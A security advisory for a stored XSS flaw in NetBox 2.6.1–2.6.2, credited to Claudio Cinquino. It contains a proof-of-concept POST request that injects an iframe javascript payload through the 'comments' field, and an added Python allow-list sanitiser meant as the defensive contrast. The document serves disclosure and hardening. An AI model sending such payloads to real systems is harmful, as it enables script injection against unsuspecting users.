NetBox version 2.6.1 - 2.6.2 Stored Cross-Site Scripting vulnerability

31-08-2019

Affected Product: NetBox version 2.6.1 - 2.6.2
Credits: Vulnerability discovered by Claudio Cinquino

CVE:  CVE-2019-25011

Executive Summary

NetBox is vulnerable to stored XSS because user-supplied input in the comments field is stored and rendered without being sanitised. Exploitation requires an authenticated user; the payload then executes in the browser of anyone who views the affected object.

Parameter:
name="comments" [ affects every page where this parameter is present, e.g. /dcim/sites/add/ ]

PoC

POST /dcim/sites/add/ HTTP/1.1
Host: xxx
User-Agent: xxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: xxx
Content-Type: multipart/form-data; boundary=---------------------------57052814523281
Content-Length: 2158
Connection: close
Cookie: csrftoken=xxx; sessionid=xxx
Upgrade-Insecure-Requests: 1

-----------------------------57052814523281
Content-Disposition: form-data; name="csrfmiddlewaretoken"

xxxx

<snipped>

-----------------------------57052814523281
Content-Disposition: form-data; name="comments"

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
-----------------------------57052814523281
Content-Disposition: form-data; name="_create"

-----------------------------57052814523281--
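The root cause above is that the stored value of "comments" reaches the page unchanged. The following is an added example, not code from the advisory or from NetBox, and it does not claim to reproduce the vendor's patch. It contrasts the vulnerable pattern (the comment is emitted verbatim) with a hardened one (a stdlib-only allow-list sanitiser: only a small set of tags and attributes survive, script/iframe content is discarded, javascript: links are dropped and all text is escaped). The payload is the one from the PoC; the function names render_comment_unfiltered, render_comment_sanitised and contains_active_content are hypothetical. Python is used because NetBox is a Django application.

```python
"""Unfiltered vs allow-list rendering of a user-supplied comment (added example, stdlib only)."""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed input: the exact value the PoC submits in the "comments" field.
XSS_PAYLOAD = '<IFRAME SRC="javascript:alert(\'XSS\');"></IFRAME>'

# Allow-list: the small subset of HTML a comment field legitimately needs.
ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "code", "p", "br", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
# Elements whose *content* must be discarded as well, not just the tags themselves.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}
SAFE_SCHEMES = {"http", "https", "mailto"}


def render_comment_unfiltered(comment: str) -> str:
    """Vulnerable pattern (hypothetical name): the stored comment is placed in the page as-is."""
    return comment


def _safe_url(value):
    """Accept relative links and http/https/mailto; reject javascript:, data:, vbscript:, etc."""
    if value is None:
        return False
    scheme = urlparse(value.strip()).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


class _AllowListSanitiser(HTMLParser):
    """Rebuilds the markup from scratch, keeping only allow-listed tags/attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._drop_depth = 0  # > 0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._drop_depth += 1
            return
        if self._drop_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag, keep (escaped) text content
        parts = [tag]
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # drops every on* event handler, style, etc.
            if name == "href" and not _safe_url(value):
                continue
            parts.append('%s="%s"' % (name, html.escape(value or "", quote=True)))
        self.out.append("<" + " ".join(parts) + ">")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/>: emit once, no closing tag

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._drop_depth = max(0, self._drop_depth - 1)
            return
        if not self._drop_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._drop_depth:
            self.out.append(html.escape(data, quote=False))  # text is always escaped


def render_comment_sanitised(comment: str) -> str:
    """Hardened pattern (hypothetical name): allow-list the markup before it reaches the page."""
    parser = _AllowListSanitiser()
    parser.feed(comment)
    parser.close()
    return "".join(parser.out)


def contains_active_content(rendered: str) -> bool:
    """Regression-test helper: does the rendered HTML still carry the payload's markers?"""
    lowered = rendered.lower()
    return "<iframe" in lowered or "<script" in lowered or "javascript:" in lowered


if __name__ == "__main__":
    print("unfiltered:", render_comment_unfiltered(XSS_PAYLOAD))
    print("sanitised :", repr(render_comment_sanitised(XSS_PAYLOAD)))
```

The sanitiser is deliberately a rebuild rather than a blacklist: nothing is copied through unless it is explicitly allowed, which is why uppercase tags, event-handler attributes and a javascript: href all disappear without being listed individually. In a real deployment a maintained allow-list library (bleach, nh3) is the better choice; the point here is the shape of the check, applied at render time to every field that accepts free text.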

Disclosure Timeline

31/08/2019 – Vulnerability Discovered
03/09/2019 – Initial vendor notification
09/10/2019 – The vendor fixed the vulnerability [1]


References

[1] https://github.com/netbox-community/netbox/issues/3471